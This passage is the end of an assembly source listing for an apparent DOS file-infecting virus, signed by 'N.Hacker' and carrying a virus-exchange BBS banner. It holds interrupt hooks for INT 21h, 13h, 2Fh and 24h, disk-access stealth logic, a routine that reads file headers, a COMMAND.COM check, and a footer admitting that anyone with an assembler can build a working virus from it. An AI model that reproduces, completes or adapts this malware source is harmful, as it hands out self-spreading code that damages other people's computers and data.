jmp It_Is_JB
|
|||
|
|
|||
|
It_Is_JA:
|
|||
|
|
|||
|
popf
|
|||
|
ja Go_out_of_trap
|
|||
|
|
|||
|
It_Is_JB:
|
|||
|
|
|||
|
mov bx,[bp+2]
|
|||
|
mov word ptr cs:[di],bx
|
|||
|
mov bx,[bp+4]
|
|||
|
mov word ptr cs:[di+2],bx
|
|||
|
mov byte ptr cs:[flag-adjust],0ff
|
|||
|
off:
|
|||
|
and [bp+6],0feff
|
|||
|
|
|||
|
Go_out_of_trap:
|
|||
|
|
|||
|
pop di
|
|||
|
pop bx
|
|||
|
pop bp
|
|||
|
iret
|
|||
|
|
|||
|
Call_Original_INT_21h:
|
|||
|
|
|||
|
pushf
|
|||
|
call dword ptr cs:[org_21h-adjust]
|
|||
|
ret
|
|||
|
|
|||
|
Call_Original_INT_2Fh:
|
|||
|
|
|||
|
pushf
|
|||
|
call dword ptr cs:[org_2fh-adjust]
|
|||
|
ret
|
|||
|
|
|||
|
INT_24h_entry:
|
|||
|
|
|||
|
mov al,3
|
|||
|
iret
|
|||
|
|
|||
|
;**************************
|
|||
|
; (C) by N.Hacker. *
|
|||
|
; (bellow) *
|
|||
|
;**************************
|
|||
|
|
|||
|
INT_13h_entry:
|
|||
|
|
|||
|
mov byte ptr cs:[next_flag-adjust],0
|
|||
|
|
|||
|
cmp ah,2
|
|||
|
jne Other
|
|||
|
|
|||
|
cmp byte ptr cs:[function-adjust],03Eh
|
|||
|
jne Dont_hide
|
|||
|
|
|||
|
dec byte ptr cs:[next_flag-adjust]
|
|||
|
inc ah
|
|||
|
jmp Dont_hide
|
|||
|
|
|||
|
Other:
|
|||
|
|
|||
|
cmp ah,3
|
|||
|
jne Dont_hide
|
|||
|
|
|||
|
cmp byte ptr cs:[flag-adjust],0ff
|
|||
|
je no_error_
|
|||
|
|
|||
|
cmp byte ptr cs:[function-adjust],03Eh
|
|||
|
je Dont_hide
|
|||
|
|
|||
|
inc byte ptr cs:[next_flag-adjust]
|
|||
|
dec ah
|
|||
|
|
|||
|
Dont_hide:
|
|||
|
|
|||
|
pushf
|
|||
|
call dword ptr cs:[current_13h-adjust]
|
|||
|
jnc no_error_
|
|||
|
mov byte ptr cs:[flag-adjust],0ff
|
|||
|
|
|||
|
no_error_:
|
|||
|
|
|||
|
clc
|
|||
|
db 0ca,02,0 ;retf 2
|
|||
|
|
|||
|
|
|||
|
DOS_13h:
|
|||
|
|
|||
|
cmp byte ptr cs:[next_flag-adjust],0
|
|||
|
je OK
|
|||
|
|
|||
|
cmp ah,2
|
|||
|
je Next
|
|||
|
cmp ah,3
|
|||
|
jne OK
|
|||
|
Next:
|
|||
|
cmp byte ptr cs:[next_flag-adjust],1
|
|||
|
jne Read
|
|||
|
inc ah
|
|||
|
jne OK
|
|||
|
Read:
|
|||
|
|
|||
|
dec ah
|
|||
|
OK:
|
|||
|
test dl,80
|
|||
|
jz Floppy
|
|||
|
jmp dword ptr cs:[org_13h-adjust]
|
|||
|
Floppy:
|
|||
|
jmp dword ptr cs:[Floppy_org_13h-adjust]
|
|||
|
|
|||
|
|
|||
|
Read_First_18:
|
|||
|
|
|||
|
sub ax,ax
|
|||
|
mov es:[di+4],ax
|
|||
|
mov es:[di+6],ax
|
|||
|
mov ah,3f
|
|||
|
mov cx,18
|
|||
|
mov dx,buffer-adjust
|
|||
|
mov si,dx
|
|||
|
call Call_Original_INT_21h
|
|||
|
ret
|
|||
|
|
|||
|
Check_For_COMMAND:
|
|||
|
|
|||
|
cmp es:[di+0f],'OC'
|
|||
|
jne Not_COMMAND
|
|||
|
cmp es:[di+11],'MM'
|
|||
|
jne Not_COMMAND
|
|||
|
cmp es:[di+13],'NA'
|
|||
|
jne Not_COMMAND ;check for command.com
|
|||
|
cmp es:[di+15],' D'
|
|||
|
jne Not_COMMAND
|
|||
|
cmp es:[di+17],'OC'
|
|||
|
jne Not_COMMAND
|
|||
|
cmp byte ptr es:[di+19],'M'
|
|||
|
|
|||
|
Not_COMMAND:
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
endcode label word
|
|||
|
|
|||
|
current_21h dd ?
|
|||
|
null dd ? ;I forgot to remove this variable...
|
|||
|
current_13h dd ?
|
|||
|
org_2fh dd ?
|
|||
|
org_13h dd ?
|
|||
|
org_21h dd ?
|
|||
|
Floppy_org_13h dd ?
|
|||
|
flag db ? ;0ff if error occures
|
|||
|
veri db ?
|
|||
|
handle dw ?
|
|||
|
fname db 8+3 dup (?)
|
|||
|
function db ?
|
|||
|
my_flag db ?
|
|||
|
limit dw ?
|
|||
|
mem_ dw ?
|
|||
|
next_flag db ?
|
|||
|
|
|||
|
buffer label word
|
|||
|
|
|||
|
;****************************************************************************;
|
|||
|
; ;
|
|||
|
; -=][][][][][][][][][][][][][][][=- ;
|
|||
|
; -=] P E R F E C T C R I M E [=- ;
|
|||
|
; -=] +31.(o)79.426o79 [=- ;
|
|||
|
; -=] [=- ;
|
|||
|
; -=] For All Your H/P/A/V Files [=- ;
|
|||
|
; -=] SysOp: Peter Venkman [=- ;
|
|||
|
; -=] [=- ;
|
|||
|
; -=] +31.(o)79.426o79 [=- ;
|
|||
|
; -=] P E R F E C T C R I M E [=- ;
|
|||
|
; -=][][][][][][][][][][][][][][][=- ;
|
|||
|
; ;
|
|||
|
; *** NOT FOR GENERAL DISTRIBUTION *** ;
|
|||
|
; ;
|
|||
|
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
|
|||
|
; Around Among the General Public. It Will be Very Useful for Learning how ;
|
|||
|
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
|
|||
|
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
|
|||
|
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
|
|||
|
; Is. Keep This Code in Responsible Hands! ;
|
|||
|
; ;
|
|||
|
;****************************************************************************;
|
|||
|
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
|||
|
|